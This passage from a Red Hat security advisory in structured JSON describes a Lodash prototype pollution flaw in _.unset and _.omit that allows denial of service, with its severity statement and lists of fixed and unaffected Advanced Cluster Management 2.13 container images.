"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:849cf23afa514a1d86073fed2424e487893655510721a0b9c0d4be4cf59bf60b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:a8843c7b628767803f2aa4b2658dc0a932157b20f98507004929036108c7dfb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:428a52072881ee7714539f7721313ca78e06fd0e39ceb8de12f8a0d33fb4cd55_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:5145c15e9fa57bdd1d072e7c88f27d5f8f51caf395e542ad8fb54a098f8c24fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:cb76c81b895dfb5bc384407baf76c5c74d9b509342e665f3d5ff234a40f16236_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:d7dae765d402cd9522c23689fc0e72f47659fc2f1184b8b16c51b6c5c6a2b890_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5af546f1d36b01b320fd950d227cdd8f62a765facc8614ba277fe218c5649e61_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:921a7995304e4648ac2fd0c08bec7d95adc09caca4d6d124cbba4ff8043edf19_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:a0928fa238b82f2c00778064d0f1e52ff507ffef7a0a3756b1f2f2022d375e4b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:fdc436ea03cb2d06976da109061aa0793672c306deef23708ee9e0b39395b6f7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:2adb87f4433d9516e2111150bccafbbb8dec179bdf3fe3acd38d7b27411cb666_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:4afad9568dc7dd2d90c396d08d596258e813bb67e2901135b539f279af382e09_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:508d4d8ee312e8d720eeca38f3823438548c5ab1260d8fa822ca49765f7aeef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:a31ab1ae8b4c3ead24f9ce3c913a4754972bd548d6e5b10ca22e61a6d9d3539a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:35ba01a14b8f7a0ed0e79fd9efe48280d26afa10a316daaec512f39cc6839adb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:384d23bb3f4e6fd2425e1b60ded99f027dcbaad14e631ffbe84845821a1c3215_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:a8ca367caa43ec006811fe370fdf440328dd22fc39be11e48f36396b781f36bb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:db8b5776a9dcb4b87a4de948c4c11d0164e66df188f97be6a6fd7e9953f5501e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:1e0a1eadbb77f4f14d48357af6a5b12406ae912210b53c14018b642e4f62d1fe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:4816e73043b8f73143cff29cff41292e62bb36467ba28a260ee46fd43ece915c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71d6b8f5471d7a23918763eeea53d991d98adf170e228348b77d2412ce752751_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:87f2e1ee942b226835c97b7abe43a62802146755141a850137b9ab03dd6fccf6_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:2b6a43ae23126321b9c94b37da646db4943331200434edc6a54be156150065f2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:d24283b13f739561fae6bdfb730922a1d3804422dc41249e33e6084158afcec4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:e9df0b0323447cacad8942ecce2e690a9f498d5cb41b54e3bb55be6614ddaece_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:ed46808dba295cf093aa5caabc9782ee9f044c7e770adaf3657f57f0f6e1aaf9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:5a98450b5f85a75172ca51e2dcf096465635dc2e4c5fedfd74e1fdd665f3fa65_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:7388c812f31ff8f2b1c2653adf07906e2f50c356a1ad9130d3923d835e79e0e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:bd521270153c8b5b8193e08fe4a7c959e5b9d22ed7e74a87827580974b3836f1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:fc3b40899a332c041667de0965d58f50325eaddc8547145a2dff9aede38d69bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0668bbb16723e23ae64e4337a1347a6e0d2854d1c173cbc59c17a829e430bc00_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:177c2cb59b6b43f4ea650bbb603b144ca37aece398635a458d518dd55cae7fb6_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:78b0d35ce4fce4d279ad089ccf284f5e1425f947d95c3c72c5755bb00464305c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:f3b200f2a00217299f66cab9f89de8673003d194292b41157f663799b5c61c3e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:02486920d371f14bcbafc720545c4a6f24523a46483e60c00c7f25f52b3ea476_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:1cb3639dfe65b6568b53de130e7b36b8f5ebceedd76c110ddb64fbe860bfde14_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:4124ae57ffa1b26bfc0e68b62c8325c5e17d332dca85b618a4ccba60cf52d1b5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:8243cc9646e4ae89aabf299e476a94124c8244dd54e0fb1c848a6bbbd0c94f62_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:2a64ce4183df6c5743ffa7df7b4192fce192e08eea5e03b76c9b621e5d351d2a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:4e6dd9d24ab247b2a7b84f7842b2a710eee3aa2fce58fc1516ef5bb55e0693f0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:d814b3c076f9ef671d74e156dce5d3f634130904f166a6a04a59df41e8ec07ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
